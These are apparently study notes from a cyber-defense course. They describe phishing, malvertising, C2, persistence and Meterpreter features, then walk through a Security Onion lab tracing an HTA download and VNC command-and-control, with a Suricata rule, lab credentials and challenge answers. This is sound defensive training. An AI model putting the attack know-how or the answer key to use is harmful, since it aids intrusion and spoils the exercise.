Part Two
Last updated
Last updated
Adversaries have learned to profit from cybercrime, using methods like credit card theft, identity theft, and stealing important trade secrets.
Modern attackers are often highly motivated and increasingly well-funded. While being well-funded doesn’t automatically make them skilled, there’s a link between money and capability, as wealthy attackers can hire skilled help. Nation-states are a prime example of well-funded adversaries, but many other groups, like organized crime and terrorist organizations, also have significant resources.
Wealthy attackers want money just like poorer ones. Regardless of their money motives, skilled attackers focus on stealing valuable data and aim to keep long-term access to organizations.
Initial service-side exploitation is now rarely effective for attackers. They still use it, but it's not their main method for breaking into secure organizations. Instead, they primarily rely on web application and client-side attacks. While these web attacks can involve popular software like WordPress or Joomla, custom web applications are especially targeted.
Adversaries often gain initial access to organizations through client-side exploitation, which requires some action from the victim. This can range from visiting a website to downloading and running a file, often involving social engineering.
Social engineering is getting someone to do something they shouldn't. How much they resist doing it can vary, but the attacker must persuade them to act. It's often humorously called a Layer 8 attack, adding the human element to the 7-Layer OSI model.
The above illustration demonstrates a phishing attack involving the use of a malicious attachment.
The attacker sends an email with a malicious PDF attachment.
The DMZ Mail Server relays the message to the Internal Mail Server.
The client checks for any new email.
The client downloads the email with the malicious attachment.
The client renders the malicious PDF, the attacker’s payload is delivered, and the client becomes compromised.
The (now compromised) client establishes an outbound C2 channel back to the attacker.
Client-side attacks are the main way hackers start their attacks, and this isn't really debated. The shift to this method happened because it works best. Hackers are practical and use the simplest methods that succeed—there's no need to complicate things if simple attacks are effective.
For years, server-side attacks effectively targeted important systems. But as attackers succeeded, we improved our defenses, like better patching, firewalls, and separating public and private networks. This forced attackers to change their methods to keep being successful.
Client-side exploitation uses various methods to attack, often relying on social engineering. Techniques can include email, social media, websites, mobile devices, or even physical access. The aim is to introduce harmful code into a system through weak applications or operating system features.
Wombat Security Technologies helps with the Verizon DBIR by sharing data from their security training and phishing awareness programs. Social engineering, especially spear phishing, is a major way attackers first compromise systems. The ThreatSim data shows that many users are still at risk: 7.3% of users were successfully phished by clicking a link or opening an attachment, and about 15% of those who were tricked once fell for it again.
This data poses a major risk to organizations and shows how attackers can keep succeeding. Later, we’ll see that traditional security systems struggle to defend against most spear phishing attacks.
Email is a common way for attackers to deliver threats. Users don't need to search for these threats; attackers send them directly. Email attacks usually use either attachments or links.
The most obvious email attack is sending harmful files as attachments. This method has been used for a long time but has become less obvious. In the past, attackers often sent emails with executable files and tried to get people to open them. While this still happens, most companies no longer allow emails with executable attachments.
More common now are adversaries attaching maliciously crafted PDF, DOC(X), RTF, WMF, etc. files that exploit vulnerabilities in default applications employed to render those files.
The author received a phishing email from SANS Securing the Human, aiming to trick them into clicking a link. At SANS, we call these emails "getting Spitznered," named after Lance Spitzner, who started the program.
The direct evil approach can work, but files must get through many security layers in a modern business. A less direct way is to use links, which are just a way to deliver web-based threats. This method faces less scrutiny from security tools and offers extra benefits. For example, it allows for more targeted attacks since the victim interacts with a web server. It also lets attackers send different attacks until one works.
Web-hosted attacks can be more effective through better targeting. The image above shows three different browsers connecting to the SANS Internet Storm Center. It’s easy to tell the browsers apart, which also reveals their versions, operating systems (like NT 6.3 for Win8.1 or Server 2012R2), and whether they're 64-bit. This information helps attackers deliver specific exploits to certain browsers, raising their chances of success.
Malvertising is a type of online threat where bad ads are added to trusted websites. Victims often try to stay safe by only visiting known sites. However, attackers can place harmful ads on these sites. For example, from late 2013 to early 2014, Yahoo.com experienced a major malvertising attack that directed users to the Magnitude exploit kit.
A newer attack, called watering hole or strategic web compromise, targets users by infecting websites they visit. It's like a lion waiting at a watering hole for prey instead of hunting directly.
A cyber watering hole attack happens when attackers compromise a legitimate website that the target victim is likely to visit. For example, in Operation Snowman, the US Veterans of Foreign Wars' website was used to spread malware to its users.
Client-side and web application attacks have increased due to improved security and patching of public systems. Attackers are also using physical methods to get around these defenses. In 2008/2009, the Conficker virus revived older boot sector malware techniques.
Mobile devices and apps can also be targeted by attackers. Although there are new attacks aimed at mobile, many threats are still similar to those seen before. The risks are largely the same, but they come in a smaller, more trusted form.
The term "minnow" isn't commonly used for phishing emails on mobile devices, but it should be. Minnows are small phishes. Phishing works the same on mobile, but there are some differences. Mobile email clients often show only the display name instead of the full email address due to limited screen space. They also display emails and links differently than traditional web-based email clients.
In the screenshot, I'm hovering over a link to see where it really goes. Many people don’t know how to do this on mobile devices. Usually, you have to press and hold the link. What if I don’t hold it long enough or my finger slips? The link we thought went to Facebook actually leads somewhere else.
Modern attackers use advanced techniques after gaining access. In the past, malware had limited effects, but now attackers can do much more after compromising a system. The upcoming content will show common post-exploitation activities in today's attacks.
Modern attackers are practical and see many uses for your computer or email. They mainly target data they can steal directly from the victim's system or data they can access through the victim.
Adversaries often target data, aiming to steal it from a network or data center. This is called data exfiltration. "Data leakage" is a similar term but can also mean accidental exposure, not just intentional theft.
Encryption on the internet has grown a lot recently, with HTTPS becoming common thanks to Let’s Encrypt (free certificates since 2016). Other encrypted protocols like QUIC, DNS over HTTPS, and DNS over TLS are also on the rise.
TLS 1.3, finalized in 2018, makes it hard to intercept or proxy traffic. Unlike TLS 1.2, passive interception using the server’s private key is no longer possible. Some workarounds include blocking QUIC or downgrading TLS versions. With networks becoming harder to monitor for malware or data leaks, more monitoring needs to happen on the host system.
The first victim rarely has the data the attacker wants. Usually, the compromised device is just a starting point to reach bigger targets.
Even if the first victim doesn't have much power in the organization, they are still in a better position and less suspicious than the attacker. Being inside the organization gives greater abilities.
The graphic above explores an example of lateral movement or pivoting.
Unsuspecting user browses a malicious site.
The website delivers a browser-based exploit to the client.
Compromised client establishes a C2 channel to the attacker.
Attacker pivots to compromise key server from within.
To have advanced post-exploitation skills, you usually need a way to control things interactively. Some complex attacks have worked without this control, but they are much more likely to fail.
Command and Control (C2), also known as C&C or CNC, lets attackers interact with victims to control their actions, access data, and manage resources. Traditionally, this was done using Remote Access Trojans (RATs) or backdoor shells, but these methods struggle with modern security measures, like firewalls. Newer C2 methods use reverse shells, allowing the victim's system to make outbound connections, which are more likely to succeed.
Adversaries usually need ongoing access to a system over a long time to reach their goals. While they can quickly compromise an endpoint, getting what they want may take days, weeks, months, or even years. To stay close to their goal, they need long-term access to one or more systems. This ongoing access is called persistence. Without it, they would have to keep breaking in again and again.
An adversary's goal may take weeks or months to achieve. If the victim notices them, the attacker can be stopped from reaching their goal, even if they have already compromised the system. Attackers try to stay hidden, especially in targeted campaigns where avoiding detection is very important.
An attacker’s goals of staying hidden and maintaining access are often opposite. Staying persistent makes it easier for the victim to detect them, while focusing on being hidden can make it hard to keep access.
Reverse shell access is a way for attackers to control systems, but Meterpreter from Metasploit is more advanced. Even if top attackers don’t use Meterpreter directly, its features show what powerful tools are available to well-funded and determined threats.
A quick list of some of the capabilities offered by the open source Meterpreter payload.
Privilege Escalation
Password/Hash Theft
Keystroke Logging
Packet Capture
Pass-the-Hash
Access Token Smuggling
Pivoting (Automatic)
File Download/Upload
TLS Encrypted
Persistence
VNC (lame, but effective)
Reverse HTTP(S) Connection
Much, much, more!
This section introduces modern cyber defense principles, contrasting them with traditional methods. These principles will form the foundation for techniques we'll cover and apply throughout the course.
A key practice is assuming that your network is already compromised, even if you don’t know it yet. This mindset helps organizations rethink their security approach, treating every asset as possibly compromised.
Modern cyber defense focuses on detecting threats, not just blocking them. Many organizations struggle with this, especially when it comes to spotting attacks inside their network after the initial breach.
To improve detection, organizations create threat hunting teams. These teams are separate from regular analysts and focus on actively searching for signs of compromise. Instead of waiting for alerts, the threat hunting team actively looks for the compromise.
Organizations shouldn't just focus on detection and teams. Modern cyber defense now focuses on detecting post-exploitation activity, not just malware or exploits.
Post-exploitation is often more damaging but easier to detect. Focusing on stopping adversaries from persisting and pivoting offers strong defense benefits.
Modern post-exploitation often shows up in typical command and control (C2) traffic. Traditional C2 traffic can be blocked easily, while using outbound TCP/443 (HTTPS) is a newer and harder communication method to control.
"Prevention is best; detection is necessary." This saying is common in SANS Cyber Defense classes, but we need to add something. Just finding out we’re under attack isn’t enough. Knowing we’re being attacked doesn't really help us. The goal of detection is to quickly take action against the attacker. We aim to go from quickly noticing an attack to actively responding, so we can prevent not just the attack itself, but its serious consequences.
Modern cyber defense focuses on understanding Layer 7 (application layer) activities because most attacks happen there. For example, HTTP can be used in all stages of an attack: exploiting the client, delivering the payload, command and control, and stealing data. Traditional Layer 3/4 security devices see this as regular outbound HTTP traffic, making it hard to spot malicious activities. To counter this, defensive tools must not only see Layer 7 traffic but also understand the specific protocols and services involved.
Many organizations don’t have a specific role to keep track of information security risks regularly. They usually check for risks only every few months, relying on security staff to highlight new threats, or they may be caught off guard.
This course won't focus much on formal risk management, but it's important to understand risk in cyber defense, including threats, vulnerabilities, likelihood, and impact. Instead of formal assessments, we'll use existing risk assessments like the CIS Controls.
The CIS Controls are a high-quality (and free!) information security best practice consensus guide.
The five tenets behind the controls are:
Offense informs defense: Learn from real attacks to build strong defenses, using only controls that can effectively prevent these attacks.
Prioritization: Invest first in controls that reduce the most risk and protect against the biggest threats. Focus on those that can be easily put in place in your environment. The CIS Implementation Groups mentioned below are a good starting point for finding useful sub-controls.
Measurements and Metrics: Create standard metrics so executives, IT staff, auditors, and security officials can easily measure how well security measures work, allowing for quick identification and implementation of necessary changes.
Continuous diagnostics and mitigation: Continuously check current security measures to see how well they work and decide what to do next.
Automation: Automate defenses to help organizations consistently and easily check how well they follow controls and related measures.
The best practices are easy and effective. The Australian Signals Directorate (ASD) lists over 35 ways to reduce cyber security incidents and says that more than 85% of known attacks could have been avoided if victims had followed the 'Top Four' strategies.
The Top Four were:
Application Control
Patch applications
Patch operating systems
Restrict administrative privileges
Four of the Essential Eight ways to stop malware are in the Prevent Malware Delivery and Execution section. These focus on prevention. Two of these, application control and patching applications, are also in the Top Four. The section also includes user application hardening and Microsoft Office macro settings.
While earlier measures focused on stopping intrusions before they start, these new ones aim to lessen the damage from intrusions that do occur. The main strategies in the "Limit Extent of Incidents" section reduce risks by fixing problems that give attackers extra advantages after they get in.
The Essential Eight includes a key measure added by ASD to combat ransomware: daily backups. While this may seem obvious, ASD sees the risk as serious enough to emphasize it as essential. They recommend that some backups should be 'disconnected' to prevent ransomware from potentially encrypting them too.
None of the strategies are Essential; the best is rated Excellent. Strategies include:
Continuous incident detection and response
Host-based intrusion detection/prevention system
Endpoint detection and response software
Hunt to discover incidents
Network-based intrusion detection/prevention system
Capture network traffic
First let's run the following command to verify that Security Onion's networking is configured properly:
Now, let's open firefox and log into Security Onion using the following credentials.
Username: student@sec511.local
Password: Security511
A user clicked on a suspicious link on July 6 th, 2023. They called the help desk, said their PC was acting funny. The help desk escalated the ticket to the security team, and mentioned the user's PC IP address is 10.5.11.57
Identify the following:
The name of the initial malware file that was downloaded and executed.
The name of the site and IP address that hosted the executable.
The software/protocol used for C2.
Let's start by going to the Security Onion Hunt menu and search for that IP:
The event we're investigating happened on July 6th. To focus our search, let's change the date from the last 24 months to the specific date of the incident.
Let's enter the following date:
Now, Let's scroll down to view the events with alerts. The Onion Query Language has a powerful "groupby" feature that makes this easier. We'll update the search string to:
Now all alerts linked to this IP address and date are now shown clearly and briefly:
The HTA alerts are probably the most important, but let's first focus on the DNS and HTTP alerts related to "*.pw" to get a clearer understanding of the incident.
Let's click on the "ET DNS Query to a *.pw domain - Likely Hostile" alert and choose "Only":
To view the packet for this alert, let's click the ">" next to the date to expand the event. Then, scroll down to check the Suricata rule that triggered the alert.
alert dns:
alert: The action this rule takes is to generate an alert when the conditions are met.
dns: This specifies that the rule applies to DNS traffic.
$HOME_NET any -> any any:
$HOME_NET any: The rule triggers when any host from the internal network ($HOME_NET
) makes a query (source IP and port are any
).
->: This indicates the traffic flow is from the internal network towards the external network.
any any: The destination IP and port can be any.
msg:"ET DNS Query to a *.pw domain - Likely Hostile":
msg: This field specifies the message that will be logged when the rule triggers. In this case, the message indicates the detection of a DNS query to a .pw
domain, which is flagged as potentially hostile.
dns.query:
This keyword indicates that the rule is analyzing the DNS query field within the DNS protocol.
content:".pw"; nocase; endswith:
content: This keyword specifies the string the rule is looking for in the DNS query. The rule is searching for .pw
.
nocase: This makes the content match case-insensitive.
endswith: This ensures that .pw
must be at the end of the domain in the DNS query (indicating a .pw
top-level domain).
content:!".u.pw"; endswith; nocase:
content: This part specifies an exception. The rule will not trigger if the domain ends with .u.pw
.
!": The exclamation mark (!
) means "not"—so it matches domains that do not end with .u.pw
.
nocase: This match is also case-insensitive.
endswith: This ensures that .u.pw
must be at the end of the domain.
classtype:
This classifies the type of attack or event as bad-unknown, meaning it’s considered malicious but the exact nature of the threat might not be fully classified.
sid:2016778; rev:8:
sid: The Signature ID uniquely identifies this rule. In this case, it is 2016778
.
rev: The revision number of the rule, which is 8
. Rules are revised when they are updated or modified.
metadata
2013_04_19, updated_at 2020_11_19:
metadata: Provides additional information about the rule.
created_at: The rule was created on April 19, 2013.
updated_at: The rule was last updated on November 19, 2020.
This rule targets DNS queries ending in ".pw" but excludes those ending in ".u.pw". The reason for focusing on ".pw" is that it’s often misused by malware creators because .pw domains are cheap. However, not all .pw traffic is malicious, though in this case, the rule is justified.
Now, let's return to the previous view ( destination.ip: 10.5.11.57 OR source.ip: 10.5.11.57 | groupby rule.name )
We'll use the same method from the previous step to check the "ET INFO HTTP Request to a *.pw domain" alert. This rule is like the previous DNS rule but is triggered by HTTP traffic instead.
Now let's inspect the HTA traffic, there are three HTA alerts associated with two connections:
This connection triggered two alerts: 10.5.11.57:52054 103.16.76.213:80 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl - ET POLICY Possible HTA Application Download
This connection triggered one alert: 10.5.11.57:52052 103.16.76.213:80 - ET POLICY Possible HTA Application Download
Let's check this alert first: "ET POLICY Possible HTA Application Download"
The message shows that the file downloaded is video.hta from the domain plugh.pw.
Now, let's click on the "ET POLICY Possible HTA Application Download" rule for the connection: 10.5.11.57:52054 103.16.76.213:80. Then, go to Actions -> PCAP. Make sure you select the connection with source port 52054.
The PCAP view shows a summary of the connection, which ended early with a "RST" (TCP reset).
Let's download the packet file and open it with wireshark.
Wireshark shows that the connection ends with a RST. Let's click on any frame and select Follow -> TCP Connection. There’s base64-encoded content that seems to be truncated.
We might wonder why the connection was aborted. This often happens with malware, as connections can fail for various reasons like poor code or network problems. However, many malware types are persistent and will keep trying until they connect. Sometimes, malware will even retry after a successful connection.
Let's check the other connection. Close Wireshark and go back in Firefox. We'll look for the "ET POLICY Possible HTA Application Download" linked to this connection: 10.5.11.57:52052 -> 103.16.76.213:80. Make sure to select the event with source port 52052. Then click the rule name and choose Actions -> PCAP.
Now, let's download the packet file and open it with wireshark.
Let's right-click on any frame and select Follow -> TCP Stream. We now have the complete payload, including base64-encoded content.
Let's decode the base64 with CyberChef.
We now have decoded the base64, revealing additional PowerShell content.
Let's look at the C2 (Command and Control) traffic. VNC (Virtual Network Computer) is a tool that lets you access desktop interfaces over a network. Although VNC itself isn't harmful, it is often used by malware for C2 purposes.
Let's return to the Security Onion tab and click the Hunt tab.
Let's now download the pcap file and open it with wireshark.
Let's right-click on any frame and select Follow -> TCP Stream. Notice the message "This program cannot be run in DOS mode."
We'll cover the Windows executable format more in class later. For now, it's important to point out that this behavior is unusual for regular VNC traffic and is more typical of malware. The connection starts with transferring a VNC executable, which runs and then reuses the same socket for VNC traffic.
Challenge Answers:
The name of the initial malware file that was downloaded and executed: video.hta
The name of the site and IP address that hosted the executable: www.plugh.pw, 103.16.76.213
The software/protocol used for C2 HTTP: VNC